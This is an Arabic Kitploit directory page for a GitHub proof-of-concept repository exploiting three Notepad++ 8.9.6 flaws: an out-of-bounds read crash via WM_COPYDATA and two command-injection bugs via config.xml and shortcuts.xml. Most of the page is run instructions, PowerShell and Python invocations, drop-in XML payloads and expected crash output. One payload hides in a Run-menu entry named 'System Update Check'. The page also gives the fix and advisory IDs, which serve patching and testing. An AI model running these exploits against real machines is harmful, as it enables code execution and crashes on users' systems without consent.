Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Notepad-8.9.6-PoC — نصوص برمجية لإثبات المفهوم لثلاث ثغرات في Notepad++ <= 8.9.6، تم تصحيحها في الإصدار v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800 | Kitploit
أدوات/GitHubGitHub/atiilla/notepad-8.9.6-poc
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubatiilla/notepad-8.9.6-poc

Notepad-8.9.6-PoC

نصوص برمجية لإثبات المفهوم لثلاث ثغرات في Notepad++ <= 8.9.6، تم تصحيحها في الإصدار v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

عرض المستودع
63منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أدوات إثبات المفهوم لـ Notepad++

CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

نصوص برمجية لإثبات المفهوم لثلاث ثغرات في Notepad++ <= 8.9.6، تم تصحيحها في الإصدار v8.9.6.1 (2026-05-26).

عرض توضيحي لـ CVE-2026-48778 - ملف → فتح المجلد المحتوي → cmd يؤدي إلى تنفيذ أوامر عن بُعد


الثغرات

CVEالنوعCVSSالتأثير
CVE-2026-48770قراءة خارج الحدود عبر WM_COPYDATA5.0تعطيل الخدمة / تعطل
CVE-2026-48778حقن أوامر نظام التشغيل عبر config.xml7.8تنفيذ أوامر عن بُعد
CVE-2026-48800حقن أوامر نظام التشغيل عبر shortcuts.xml7.8تنفيذ أوامر عن بُعد

المتطلبات

  • ويندوز 10/11 (يُوصى باستخدام آلة افتراضية)
  • تثبيت Notepad++ <= 8.9.6 وعدم تحديثه
  • بايثون 3.x (للنصوص البرمجية .py)
  • باور شيل (مدمج، للنصوص البرمجية .ps1)

هيكل الملفات

root@kitploit:~
.
├── README.md
├── poc_CVE-2026-48770.py                    # OOB read crash (ctypes)
├── poc_CVE-2026-48778.py                    # RCE via config.xml
├── poc_CVE-2026-48800.py                    # RCE via shortcuts.xml
└── payloads/
    ├── config.xml                           # Drop-in payload (CVE-2026-48778)
    ├── shortcuts.xml                        # Drop-in payload (CVE-2026-48800)
    └── poc_CVE-2026-48770.ps1               # OOB read crash (PowerShell)

CVE-2026-48770 - قراءة خارج الحدود عبر WM_COPYDATA

ترسل عملية محلية في نفس جلسة ويندوز رسالة WM_COPYDATA مُعدلة (dwData=3) بدون مُنهي NUL. يقرأ المعالج خارج حدود المخزن المؤقت، مما يُنتج انتهاك وصول (0xc0000005) يؤدي إلى تعطل Notepad++.

التشغيل: يجب أن يكون Notepad++ مفتوحًا.

باور شيل:

root@kitploit:~
# From payloads\
powershell -ExecutionPolicy Bypass -File poc_CVE-2026-48770.ps1

بايثون:

root@kitploit:~
python poc_CVE-2026-48770.py

المخرجات المتوقعة:

root@kitploit:~
[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

تختفي نافذة Notepad++. قد يتم تشغيل WER (الإبلاغ عن أخطاء ويندوز).


CVE-2026-48778 - تنفيذ أوامر عن بُعد عبر config.xml

يُقرأ %APPDATA%\Notepad++\config.xml عند بدء التشغيل. يتم تمرير قيمة <GUIConfig name="commandLineInterpreter"> مباشرة إلى ShellExecute() دون تحقق. استبدالها بأي ملف تنفيذي يُحقق تنفيذ أوامر عن بُعد عندما ينقر المستخدم على ملف → فتح المجلد المحتوي → cmd.

الطريقة أ - نص بايثون (مُوصى به)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe

# Trigger: open Notepad++ -> File -> Open Containing Folder -> cmd
# calc.exe launches instead of cmd.exe

# Restore
python poc_CVE-2026-48778.py --mode direct --restore

الطريقة ب - إسقاط ملف XML

root@kitploit:~
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Open Notepad++ -> File -> Open Containing Folder -> cmd

الطريقة ج - دليل الإعدادات (بدون كتابة في AppData)

root@kitploit:~
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: File -> Open Containing Folder -> cmd

CVE-2026-48800 - تنفيذ أوامر عن بُعد عبر shortcuts.xml

يُقرأ %APPDATA%\Notepad++\shortcuts.xml عند بدء التشغيل. تُضاف إدخالات <Command> ضمن <UserDefinedCommands> إلى قائمة تشغيل وتُمرر مباشرة إلى ShellExecute() دون تحقق. يتم تنفيذ إدخال يتحكم به المهاجم عند النقر.

الطريقة أ - نص بايثون (مُوصى به)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "System Update Check"

# Trigger: close and reopen Notepad++ -> Run menu -> "System Update Check"
# calc.exe launches

# Restore
python poc_CVE-2026-48800.py --mode direct --restore

الطريقة ب - إسقاط ملف XML

root@kitploit:~
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Restart Notepad++ -> Run menu -> "System Update Check"

الطريقة ج - دليل الإعدادات (بدون كتابة في AppData)

root@kitploit:~
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# Prints the notepad++.exe -settingsDir= launch command
# Trigger: Run menu -> "System Update Check"

التخفيف

قم بتحديث Notepad++ إلى الإصدار v8.9.6.1 أو أحدث.
التحميل: https://notepad-plus-plus.org/downloads/


مراجع الإشعارات

CVEالإشعار
CVE-2026-48770GHSA-r39g-3mcw-xcg2
CVE-2026-48778GHSA-7hm3-wp5q-ccv9
CVE-2026-48800GHSA-3x3f-3j39-pj3v

لأغراض البحث والاختبار المُصرح به فقط.

تنزيل الأداة